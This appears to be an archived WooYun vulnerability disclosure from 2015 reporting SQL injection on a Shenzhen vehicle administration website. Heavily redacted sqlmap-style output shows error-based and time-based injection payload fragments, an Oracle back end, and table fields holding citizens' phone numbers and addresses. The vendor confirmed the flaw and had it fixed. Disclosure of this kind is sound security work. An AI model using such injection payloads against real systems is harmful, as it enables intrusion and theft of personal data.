乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-13: 细节已通知厂商并且等待厂商处理中 2015-04-14: 厂商已经确认,细节仅向厂商公开 2015-04-24: 细节向核心白帽子及相关领域专家公开 2015-05-04: 细节向普通白帽子公开 2015-05-14: 细节向实习白帽子公开 2015-05-29: 细节向公众公开
RT
*****^^^*****1.://**.**.**//www.szcgs.com.cn/wscgs2/Query_cond12.aspx</code>_*****f04dbceffec413b3bc5f0a.png**********存 ^**********2/Query_cond**********zcgs.c**********ion: ke**********ength**********ol: ma**********,application/xml;q=0**********www.szcg**********eWebKit/537.36 (KHTML, like G**********on/x-www-for**********.com.cn/wscgs**********: gzip, **********: zh-CN,**********FAFBJJOI; ASP.NET_Sessi********************LDw8WAh8ABQQzMDU3ZGRkSrJcz71z0CsWSBtNbKfh5p2yJVY%3D&__VIEWSTATEGENERATOR=BACEFA3B&__EVENTVALIDATION=%2FwEWBQLJ5ublDwLJ4frZBwLYtr%2BxAgK8%2FvbCDgKt7K6OC21OuNc7hA5YlvWtF9e*****
***** injection points with**********:**********-**********: P**********tPlaceHolder**********rror-b**********ed - WHERE or HA**********GUMENT=&__VIEWSTA**********MDE15bm0NOaciDEw5pe**********bmJzcDsmbmJzcDsmbmJ**********oIHvvIzlj6/lr7npooT**********QzMDU3ZGRkSrJcz71z0C**********VALIDATION=/wEWBQLJ5**********amp;ctl00$ContentPla**********(CHR(60)||CHR(58)||C**********WHEN (2899=2899) TH**********98)||CHR(113)||CHR(6**********older1$txtLsh=admin&**********er1$btnNext=%E4%B8********************R time-b********** AND time**********GUMENT=&__VIEWSTA**********MDE15bm0NOaciDEw5pe**********bmJzcDsmbmJzcDsmbmJ**********oIHvvIzlj6/lr7npooT**********QzMDU3ZGRkSrJcz71z0C**********VALIDATION=/wEWBQLJ5**********amp;ctl00$ContentPla**********SAGE(CHR(86)||CHR(67**********PlaceHolder1$txtLsh=admi**********older1$btnNext=%E4**********-********** back-end D**********stem: Window**********, Microsoft IIS 6.**********MS: Or********** going to be used o**********tabase names **********ing database********** query used r**********atabas**********TXS********** H********** J**********DSY********** O**********DM_********** O**********LAP**********RDS**********UTL********** P********** Q**********S_C**********S_C**********S_E**********S_O**********S_W**********MAN**********COT********** S********** S**********YST**********ZZH**********KSY**********MSY********** W**********t;/co**********种类,手机号码,行政区划,车辆类型,号牌号码,联系电话,住所详细地址*****
过滤吧
危害等级:高
漏洞Rank:10
确认时间:2015-04-14 10:49
验证确认所描述的问题,已通知其修复。
暂无